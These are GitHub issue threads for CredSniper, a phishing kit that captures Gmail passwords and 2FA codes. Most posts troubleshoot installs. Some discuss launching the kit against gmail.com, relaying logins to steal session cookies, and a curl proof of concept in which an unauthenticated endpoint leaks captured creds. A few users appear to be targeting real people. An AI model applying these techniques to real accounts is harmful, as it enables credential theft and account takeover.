why am I getting this error?

python3 credsniper.py --module gmail --twofactor --port 443 --ssl --verbose --final gmail.com --hostname gmail.com
Traceback (most recent call last):
  File "credsniper.py", line 1, in <module>
    from flask import Flask, jsonify, request, abort, Response
ImportError: No module named 'flask'

While testing the Gmail module, I noticed that

There is an identifier selector. Initially, this seemed promising to me, but after attempting to use that instead, I noticed that code that handles pass_form below that doesn't seem to work either.

It looks like the Gmail login flow may have changed since this code last worked?

Love your talk at Cactuscon. It's a great checklist to start off with. This is a follow-up issue to the question I asked.

As we discussed, the U2F method verifies the domain name before it hands over the unique code. Credsniper can't fake that part. It was a bit incredible to see the claim that this handles "all" 2FA but a quick investigation shows that this just punts those to the user-entered codes such as SMS/TOTP.

The question is:

Is it possible to setup a code-less Google or G Suite Account? No backup codes, no TOTP, no SMS.

Possible approaches/ingredients:

• Two U2F keys - I heard this is what they do internally at Google.
  • https://support.google.com/accounts/answer/6103523?co=GENIE.Platform%3DAndroid&hl=en#lost-security-key
• Forcing U2F only validation on the G Suite Domain. Does this disable SMS/Backup Codes/TOTP?
  • https://support.google.com/a/answer/2548882?hl=en
  • Can this be applied to normal run of the mill Gmail accounts? Probably not since G Suite can cross-delegate practically.

No documentation exists at the moment. At a minimum, we should provide documentation outlining how to create new modules, the requirements for a module and how to integrate Jinja2 templating with module templates. The routing can get a bit tricky since all the Flask end-points are created dynamically, outlining this process would really help drive new module development.

Hey @ustayready , I've got a GitHub module that I want to submit a PR for but I got to thinking...

Since GitHub users are more technically savvy than the average gmail user, I chose to not downgrade GitHub logins to SMS. This means that, in a best-case scenario, I've got 30 second to steal an entered 2FA token.

My GitHub modules instead logs in with the provided creds/OTP and stores the all 'Set-Cookie' values from a successful authentication. From there, timing is less of an issue. I can pop the session cookies into my browser some hours later and still get access to the target's github account.

My point: What do you think about baking this functionality into credsniper core as opposed to at the module level? Maybe default behaviour or by adding a --sessions option? I'm happy to do it, just asking if it's the sort of direction you'd be OK with taking for CredSniper

when target write wrong password .your script dont show wrong password page

When I try to spin an instance without the 2FA it fails the creation of the Certificate and leads to the issue #11 .

The site is active after installation with install.sh file ....ip address of visitors to the site appears at the terminal...I tested myself and it seemed my ip address...but different ip addresses started to appear..
in this experiment first the french ip address was seen then the american ip address was seen...
I just opened the site yet new and the site has been active for only 20 minutes..there is no one who knows the name of the site other than me...

why does someone else's ip address look like on terminal ?? do somebody have the right to access this program ??can you access the information of people who use this program @ustayready

i think when my site is active you can see it and you can enter my site and look at the passwords @ustayready

In the install.sh script, the port is asked to the user but the $port variable is never used when CredSniper is started.

getting this error after command execution.

how i can serve static files like .css or .js for a customize module?

i used "url_for" function but that is not working correctly, flask can't find the static files.

GET /config leaks the API token. This allows for access to the creds viewing API which can cause victim creds to be leaked to unauthenticated remote adversaries (and the blue team)

% curl -k 'https://credsniper.ring0.lol/creds/view'          
{
  "message": "Invalid API token"
}

% curl -k https://credsniper.ring0.lol/config                                                                                                                                                                                
{
  "api_token": "Bs5yuLAnTSGE6qddCRouTacFOunZPgXx",
  "enable_2fa": true,
  "module": "gmail"
}

% curl -k 'https://credsniper.ring0.lol/creds/view?api_token=Bs5yuLAnTSGE6qddCRouTacFOunZPgXx'
{
  "creds": [
    {
      "city": "Melbourne",
      "cred_id": "dd1ca1f4-3b89-4631-b3e1-2d6094642097",
      "ip_address": "127.0.0.1",
      "module": "gmail",
      "password": "hunter2",
      "region": "Australia",
      "seen": false,
      "two_factor_token": "123456",
      "two_factor_type": "2fa_type",
      "username": "AzureDiamond@localhost",
      "zip_code": "3000"
    }
  ]
}

(Note that I had to fake the data within .sniped to POC the issue above. I could not get the code that writes .sniped to fire. I could get .cache to be written but its contents are not disclosed through the API)

POST /config is also unauthenticated allowing for settings to be modified to no ill effect (apart from modifying the API token)

GET /creds/seen/<ID> is unauthenticated but not terribly sensitive (allows an adversary to view the UUID's of "seen" creds, and mark creds as having been "seen" by the phishing campaign operator)

GET /creds/2fa/<USER>/<PASSWORD> is unauthenticated but very uninteresting.

I insalled it in Kali iwas getting internal serrver error
i tried to install it in ubuntu on digitalocean After fixing some issues due to missing libraries, I got the final error
@jojo :/home/CredSniper# python credsniper.py --module gmail --twofactor --port 443 --ssl --final google.com --hostname xxxxxx
Traceback (most recent call last):
File "credsniper.py", line 120, in
cs = CredSniper()
File "credsniper.py", line 27, in init
self.prepare_module()
File "credsniper.py", line 37, in prepare_module
loader=PackageLoader('credsniper', package),
File "/usr/local/lib/python2.7/dist-packages/jinja2/loaders.py", line 224, in init
provider = get_provider(package_name)
File "/usr/lib/python2.7/dist-packages/pkg_resources/init.py", line 431, in get_provider
import(moduleOrReq)
File "/home/CredSniper/credsniper.py", line 120, in
cs = CredSniper()
File "/home/CredSniper/credsniper.py", line 27, in init
self.prepare_module()
File "/home/CredSniper/credsniper.py", line 41, in prepare_module
self.module = importlib.import_module(module_path).load(self.enable_2fa)
File "/home/CredSniper/modules/gmail/gmail.py", line 278, in load
return GmailModule(enable_2fa)
File "/home/CredSniper/modules/gmail/gmail.py", line 17, in init
super().init(self)

When running, the following warning pops out:

CredSniper/lib/python3.6/site-packages/bs4/__init__.py:181: UserWarning: No parser was explicitly specified, so I'm using the best available HTML parser for this system ("lxml"). This usually isn't a problem, but if you run this code on another system, or in a different virtual environment, it may use a different parser and behave differently.

The code that caused this warning is on line 147 of the file credsniper.py. To get rid of this warning, change code that looks like this:

 BeautifulSoup(YOUR_MARKUP})

to this:

 BeautifulSoup(YOUR_MARKUP, "lxml")

  markup_type=markup_type))

A base module that defines the required parameters and functions will provide better insight and cleaner code. All modules should inherit from the base module and can then override as necessary. The main application loads modules using importlib and certain functions and parameters need to be present in the module in order to execute correctly, dynamically generate the Flask routes and persist parameters.

hello jello !! thank you for this !! but what does this should be "hostname for certificates" !!?

hello. i am testing credsniper.

i have " email name - email password - 2fa sms number

, i dont understand now.. if I try to log in with an email and password, I will send sms again ..If i send sms again,how sms number on hand will work

do not have a token number like evilginx ???can i go the mail box with cookies like evilginx ???

now can you tell me how to login with the sms code ??

Credential storage should be moved from the .cache and .sniped files into SQLite using standard tables. This will make it much easier to run multiple phishing campaigns using different modules while making it a much cleaner approach. It also eliminates the potential for race conditions, locked files and all kinds of other problems.

root: source bin/activate
[] Preparing environment...
[] SSL Enabled: Y
[] Hostname: [redacted]
[] Two-factor: Y
[] Loading Module: gmail
[] Port: 443
[] Destination URL: [redacted]
[] Starting credsniper w/ flags: --ssl --twofactor --verbose
[] Adding Let's Encypt repository...
Traceback (most recent call last):
File "/usr/bin/lsb_release", line 25, in
import lsb_release
ModuleNotFoundError: No module named 'lsb_release'
Traceback (most recent call last):
File "/usr/bin/lsb_release", line 25, in
import lsb_release
ModuleNotFoundError: No module named 'lsb_release'
Traceback (most recent call last):
File "/usr/bin/lsb_release", line 25, in
import lsb_release
ModuleNotFoundError: No module named 'lsb_release'
Traceback (most recent call last):
File "/usr/bin/lsb_release", line 25, in
import lsb_release
ModuleNotFoundError: No module named 'lsb_release'
Traceback (most recent call last):
File "/usr/bin/lsb_release", line 25, in
import lsb_release
ModuleNotFoundError: No module named 'lsb_release'
Traceback (most recent call last):
File "/usr/bin/lsb_release", line 25, in
import lsb_release
ModuleNotFoundError: No module named 'lsb_release'
Hit:1 https://repos-droplet.digitalocean.com/apt/droplet-agent main InRelease
Hit:2 https://packages.microsoft.com/ubuntu/20.04/prod focal InRelease
Hit:3 http://mirrors.digitalocean.com/ubuntu focal InRelease
Get:4 http://security.ubuntu.com/ubuntu focal-security InRelease [114 kB]
Hit:5 http://archive.ubuntu.com/ubuntu focal InRelease
Ign:6 http://ppa.launchpad.net/certbot/certbot/ubuntu focal InRelease
Get:7 http://mirrors.digitalocean.com/ubuntu focal-updates InRelease [114 kB]
Get:8 http://mirrors.digitalocean.com/ubuntu focal-backports InRelease [108 kB]
Ign:9 http://ppa.launchpad.net/certbot/certbot/ubuntu jammy InRelease
Get:10 http://mirrors.digitalocean.com/ubuntu focal-updates/main amd64 Packages [1712 kB]
Err:11 http://ppa.launchpad.net/certbot/certbot/ubuntu focal Release
404 Not Found [IP: 2001:67c:1560:8008::19 80]
Err:12 http://ppa.launchpad.net/certbot/certbot/ubuntu jammy Release
404 Not Found [IP: 2001:67c:1560:8008::19 80]
Get:13 http://mirrors.digitalocean.com/ubuntu focal-updates/universe amd64 Packages [916 kB]
Reading package lists... Done
E: The repository 'http://ppa.launchpad.net/certbot/certbot/ubuntu focal Release' does not have a Release file.
N: Updating from such a repository can't be done securely, and is therefore disabled by default.
N: See apt-secure(8) manpage for repository creation and user configuration details.
E: The repository 'http://ppa.launchpad.net/certbot/certbot/ubuntu jammy Release' does not have a Release file.
N: Updating from such a repository can't be done securely, and is therefore disabled by default.
N: See apt-secure(8) manpage for repository creation and user configuration details.
[] Updating Apt...
E: The repository 'http://ppa.launchpad.net/certbot/certbot/ubuntu focal Release' does not have a Release file.
E: The repository 'http://ppa.launchpad.net/certbot/certbot/ubuntu jammy Release' does not have a Release file.
[] Installing pre-reqs...
[] Creating & activating virtual environment...
[] Enabling port binding for Python...
[] Installing required Python modules...
ERROR: Exception:
Traceback (most recent call last):
File "/root/CredSniper/lib/python3.8/site-packages/pip/_internal/cli/base_command.py", line 186, in _main
status = self.run(options, args)
File "/root/CredSniper/lib/python3.8/site-packages/pip/_internal/commands/install.py", line 305, in run
session = self.get_default_session(options)
File "/root/CredSniper/lib/python3.8/site-packages/pip/_internal/cli/req_command.py", line 74, in get_default_session
self._session = self.enter_context(self._build_session(options))
File "/root/CredSniper/lib/python3.8/site-packages/pip/_internal/cli/req_command.py", line 84, in _build_session
session = PipSession(
File "/root/CredSniper/lib/python3.8/site-packages/pip/_internal/network/session.py", line 241, in init
self.headers["User-Agent"] = user_agent()
File "/root/CredSniper/lib/python3.8/site-packages/pip/_internal/network/session.py", line 132, in user_agent
zip(["name", "version", "id"], distro.linux_distribution()),
File "/usr/share/python-wheels/distro-1.4.0-py2.py3-none-any.whl/distro.py", line 122, in linux_distribution
return _distro.linux_distribution(full_distribution_name)
File "/usr/share/python-wheels/distro-1.4.0-py2.py3-none-any.whl/distro.py", line 677, in linux_distribution
self.version(),
File "/usr/share/python-wheels/distro-1.4.0-py2.py3-none-any.whl/distro.py", line 737, in version
self.lsb_release_attr('release'),
File "/usr/share/python-wheels/distro-1.4.0-py2.py3-none-any.whl/distro.py", line 899, in lsb_release_attr
return self._lsb_release_info.get(attribute, '')
File "/usr/share/python-wheels/distro-1.4.0-py2.py3-none-any.whl/distro.py", line 552, in get
ret = obj.dict[self._fname] = self._f(obj)
File "/usr/share/python-wheels/distro-1.4.0-py2.py3-none-any.whl/distro.py", line 1012, in _lsb_release_info
stdout = subprocess.check_output(cmd, stderr=devnull)
File "/usr/lib/python3.8/subprocess.py", line 415, in check_output
return run(popenargs, stdout=PIPE, timeout=timeout, check=True,
File "/usr/lib/python3.8/subprocess.py", line 516, in run
raise CalledProcessError(retcode, process.args,
subprocess.CalledProcessError: Command '('lsb_release', '-a')' returned non-zero exit status 1.
[] Creating & installing SSL certificates...
An unexpected error occurred:
subprocess.CalledProcessError: Command '('lsb_release', '-a')' returned non-zero exit status 1.
Please see the logfile '/tmp/tmpnng48ye8/log' for more details.

Upon running with Python3, I encounter the following:
[] ###################################################
[] Successfully installed everything!
[] To run manually just:
[] ~/CredSniper$ source bin/activate
[] (CredSniper) ~/CredSniper$ python credsniper.py
[] ###################################################
[*] Launching CredSniper...
Traceback (most recent call last):
File "credsniper.py", line 1, in
from flask import Flask, jsonify, request, abort, Response
ModuleNotFoundError: No module named 'flask'

No problem right? pip install flask!
But then....

ERROR: Exception:
Traceback (most recent call last):
File "/root/CredSniper/lib/python3.8/site-packages/pip/_internal/cli/base_command.py", line 186, in _main
status = self.run(options, args)
File "/root/CredSniper/lib/python3.8/site-packages/pip/_internal/commands/install.py", line 305, in run
session = self.get_default_session(options)
File "/root/CredSniper/lib/python3.8/site-packages/pip/_internal/cli/req_command.py", line 74, in get_default_session
self._session = self.enter_context(self._build_session(options))
File "/root/CredSniper/lib/python3.8/site-packages/pip/_internal/cli/req_command.py", line 84, in _build_session
session = PipSession(
File "/root/CredSniper/lib/python3.8/site-packages/pip/_internal/network/session.py", line 241, in init
self.headers["User-Agent"] = user_agent()
File "/root/CredSniper/lib/python3.8/site-packages/pip/_internal/network/session.py", line 132, in user_agent
zip(["name", "version", "id"], distro.linux_distribution()),
File "/usr/share/python-wheels/distro-1.4.0-py2.py3-none-any.whl/distro.py", line 122, in linux_distribution
return _distro.linux_distribution(full_distribution_name)
File "/usr/share/python-wheels/distro-1.4.0-py2.py3-none-any.whl/distro.py", line 677, in linux_distribution
self.version(),
File "/usr/share/python-wheels/distro-1.4.0-py2.py3-none-any.whl/distro.py", line 737, in version
self.lsb_release_attr('release'),
File "/usr/share/python-wheels/distro-1.4.0-py2.py3-none-any.whl/distro.py", line 899, in lsb_release_attr
return self._lsb_release_info.get(attribute, '')
File "/usr/share/python-wheels/distro-1.4.0-py2.py3-none-any.whl/distro.py", line 552, in get
ret = obj.dict[self._fname] = self._f(obj)
File "/usr/share/python-wheels/distro-1.4.0-py2.py3-none-any.whl/distro.py", line 1012, in _lsb_release_info
stdout = subprocess.check_output(cmd, stderr=devnull)
File "/usr/lib/python3.8/subprocess.py", line 415, in check_output
return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
File "/usr/lib/python3.8/subprocess.py", line 516, in run
raise CalledProcessError(retcode, process.args,
subprocess.CalledProcessError: Command '('lsb_release', '-a')' returned non-zero exit status 1.

Problem in Pictuer ||| UP |||

Hi,

Thanks to come up with this awesome tool.

2FA does not work. I've tried to spin a new ec2 and it fails when it gets to 2FA (/authenticate) part.

Entire exception is pasted below:

Exception happened during processing of request from ('137.129.114.42', 55298)
Traceback (most recent call last):
  File "/usr/lib/python3.5/socketserver.py", line 313, in _handle_request_noblock
    self.process_request(request, client_address)
  File "/usr/lib/python3.5/socketserver.py", line 341, in process_request
    self.finish_request(request, client_address)
  File "/usr/lib/python3.5/socketserver.py", line 354, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.5/socketserver.py", line 681, in __init__
    self.handle()
  File "/opt/CredSniper/lib/python3.5/site-packages/werkzeug/serving.py", line 293, in handle
    rv = BaseHTTPRequestHandler.handle(self)
  File "/usr/lib/python3.5/http/server.py", line 422, in handle
    self.handle_one_request()
  File "/opt/CredSniper/lib/python3.5/site-packages/werkzeug/serving.py", line 328, in handle_one_request
    return self.run_wsgi()
  File "/opt/CredSniper/lib/python3.5/site-packages/werkzeug/serving.py", line 270, in run_wsgi
    execute(self.server.app)
  File "/opt/CredSniper/lib/python3.5/site-packages/werkzeug/serving.py", line 258, in execute
    application_iter = app(environ, start_response)
  File "/opt/CredSniper/lib/python3.5/site-packages/flask/app.py", line 1997, in __call__
    return self.wsgi_app(environ, start_response)
  File "/opt/CredSniper/lib/python3.5/site-packages/flask/app.py", line 1982, in wsgi_app
    response = self.full_dispatch_request()
  File "/opt/CredSniper/lib/python3.5/site-packages/flask/app.py", line 1612, in full_dispatch_request
    rv = self.dispatch_request()
  File "/opt/CredSniper/lib/python3.5/site-packages/flask/app.py", line 1598, in dispatch_request
    return self.view_functions[rule.endpoint](**req.view_args)
  File "/opt/CredSniper/modules/gmail/gmail.py", line 53, in authenticate
    triggered = self.trigger()
  File "/opt/CredSniper/modules/gmail/gmail.py", line 155, in trigger
    pass_form.set('Passwd', self.password)
  File "/opt/CredSniper/lib/python3.5/site-packages/mechanicalsoup/form.py", line 258, in set
    raise LinkNotFoundError("No valid element named " + name)
mechanicalsoup.utils.LinkNotFoundError: No valid element named Passwd

Cheers

hello my friend.. a few months ago this program was working very nicely.

there was no problem using this program on my own computer

but when I tried to use it on my vps server, I realized that 2-step verification is not working..

Is the problem due to my vps server or the program?

After 3 or 4 months, I'm thinking of publishing educational videos in udemy

I want to have credsniper program in my training videos..I hope this beautiful program always works

when are you considering publishing the new version of this program ?

or will you edit this program ?

I'd like to add webhook functionality, so that when new creds are received, CredSniper can fire off a request to a user-specified url.

This enables things like posting to slack or using IFTTT to send SMS messages, dispatch emails, put things in spreadsheets, flash your lights at home, tweet, ...

(I like IFTTT)

Does that sound useful?